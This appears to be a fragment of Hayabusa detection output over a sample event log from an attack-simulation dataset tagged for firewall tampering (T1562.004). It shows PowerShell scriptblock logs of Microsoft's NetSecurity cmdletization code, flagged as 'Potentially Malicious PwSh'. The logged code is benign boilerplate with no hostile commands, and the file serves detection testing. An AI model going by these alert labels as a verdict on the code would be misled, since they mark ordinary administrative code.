[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ciatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, 
$false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 
